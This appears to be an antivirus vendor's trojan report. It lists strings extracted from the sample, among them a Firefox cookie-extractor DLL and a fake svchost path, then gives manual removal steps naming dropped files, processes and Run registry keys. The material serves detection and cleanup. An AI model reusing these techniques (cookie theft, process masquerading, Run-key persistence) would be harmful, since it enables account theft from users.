%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
%Documents and Settings%\%current user%\Application Data\scvhost.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

DW20.EXE_2176_rwx_00AB0000_0003B000:


DW20.EXE_2176_rwx_014A0000_0006C000:


svchost.exe_2084_rwx_00130000_0003B000:


svchost.exe_2084_rwx_00E00000_0006C000:

dwm.exe_440_rwx_00130000_0003B000:


dwm.exe_440_rwx_00400000_00008000:


Explorer.EXE_880_rwx_01F10000_0003B000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan the system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    xcopy.exe:2188
    cscript.exe:844
    cscript.exe:2216
    cscript.exe:2028
    cscript.exe:2080
    cscript.exe:3876
    cscript.exe:2988
    cscript.exe:2680
    cscript.exe:2372
    %original file name%.exe:1308
    scvhost.exe:2464
    scvhost.exe:3252
    scvhost.exe:1208
    scvhost.exe:1100
    tasklist.exe:2880
    loader.exe:1512
    ibza.exe:976
    hostname.exe:2756
    ipconfig.exe:3116
    soft.exe:604
    soft.exe:284
    fffffffffffffff.exe:3440
    netsh.exe:3540

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\Oracle\lib\rt.jar (336534 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npjpi160_18.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ssv.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\npdeploytk.dll (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\audio\soundbank.gm (3073 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_de.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\plugin.jar (11518 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\policytool.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\jvm.hprof.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\rmi.dll (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\instrument.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpioji.dll (65 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\management-agent.jar (382 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npt.dll (8 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\pack200.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\j2pcsc.dll (7 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\rmid.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jqs.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpishare.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\sunmscapi.dll (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javacpl.exe (59 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\msvcr71.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_ja.properties (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jkernel.dll (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\psfont.properties.ja (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_zh_TW.rtf (29 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\hpi.dll (15 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ssvagent.exe (30 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_ko.properties (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_sv.rtf (45 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\unpack200.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\task.xml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpiexp.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpinscp.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jsound.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages.properties (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\client\jvm.dll (18248 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\cmm.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\flavormap.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\unpack.dll (61 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\msvcrt.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jbroker.exe (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javacpl.cpl (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\README.txt (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\management.dll (18 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\PYCC.pf (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_it.rtf (25 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.98.bfc (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_fr.rtf (37 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\msvcr71.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\fontmanager.dll (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\CIEXYZ.pf (51 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jdwp.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\tzmappings (7 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\tnameserv.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\classlist (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jaas_nt.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_es.rtf (26 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpeg.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\orbd.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\task64.xml (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\unicows.dll (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\nio.dll (20 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\servertool.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\net.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\ffjcext.zip (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ktab.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\splashscreen.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\lzma.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_fr.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\jsse.jar (3361 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\deploytk.dll (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2native.dll (8 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\psfontj2d.properties (10 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\eula.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\COPYRIGHT (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javaw.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java_crw_demo.dll (14 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\rmiregistry.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npoji610.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\deploy.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\awt.dll (7726 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\client\Xusage.txt (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\LINEAR_RGB.pf (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_de.rtf (39 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_ja.rtf (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\regutils.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_sv.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jli.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\kinit.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\mlib_image.dll (4185 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jsoundds.dll (18 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\Welcome.html (994 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_es.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\resources.jar (7547 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy.jar (22350 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE.rtf (13 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\j2pkcs11.dll (41 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\calendars.properties (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2ssv.dll (41 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.properties.src (9 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\sRGB.pf (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\new_plugin\npjp2.dll (65 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\hprof.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_zh_CN.rtf (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\dt_shmem.dll (16 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\ioser12.dll (12 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\sound.properties (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\java-rmi.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\jce.jar (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\cmm\GRAY.pf (632 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\client\classes.jsa (100416 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\THIRDPARTYLICENSEREADME.txt (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\javaws.exe (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\JdbcOdbc.dll (36 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\net.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jpicom.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\klist.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jqsnotify.exe (55 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\content-types.properties (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2launcher.exe (23 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\w2k_lsa_auth.dll (24 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jp2iexp.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\npdeploytk.dll (2321 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\LICENSE_ko.rtf (44 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.bfc (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\deploy\messages_it.properties (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\dt_socket.dll (13 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\jawt.dll (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\wsdetect.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\zip.dll (47 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\javaws.jar (5873 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\axbridge.dll (601 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\charsets.jar (49738 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\logging.properties (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\verify.dll (31 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\keytool.exe (33 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\fontconfig.98.properties.src (7 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\bin\dcpr.dll (673 bytes)
    %Documents and Settings%\%current user%\Application Data\Oracle\lib\meta-index (2 bytes)
    %Documents and Settings%\%current user%\Application Data\cry.exe (162 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (571 bytes)
    %Documents and Settings%\%current user%\Application Data\crys.exe (1744 bytes)
    %Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Application Data\soft.exe (226 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
    %Documents and Settings%\%current user%\Application Data\scvhost.exe (10815 bytes)
    %Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\crys.exe (1744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\New Order.jar (240 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\run.dat (8 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\catalog.dat (216 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\fffffffffffffff.exe (1645 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\storage.dat (1654 bytes)
    %Documents and Settings%\All Users\Application Data\wipeshadow.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\loader.exe (77 bytes)
    %Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\settings.bin (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpbe9c0882.bat (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpa3c7d18a.bat (215 bytes)
    %Documents and Settings%\%current user%\Application Data\svchost.exe (113 bytes)
    %Documents and Settings%\%current user%\Application Data\Imxyhi\ibza.exe (226 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp2edc71a6.bat (209 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
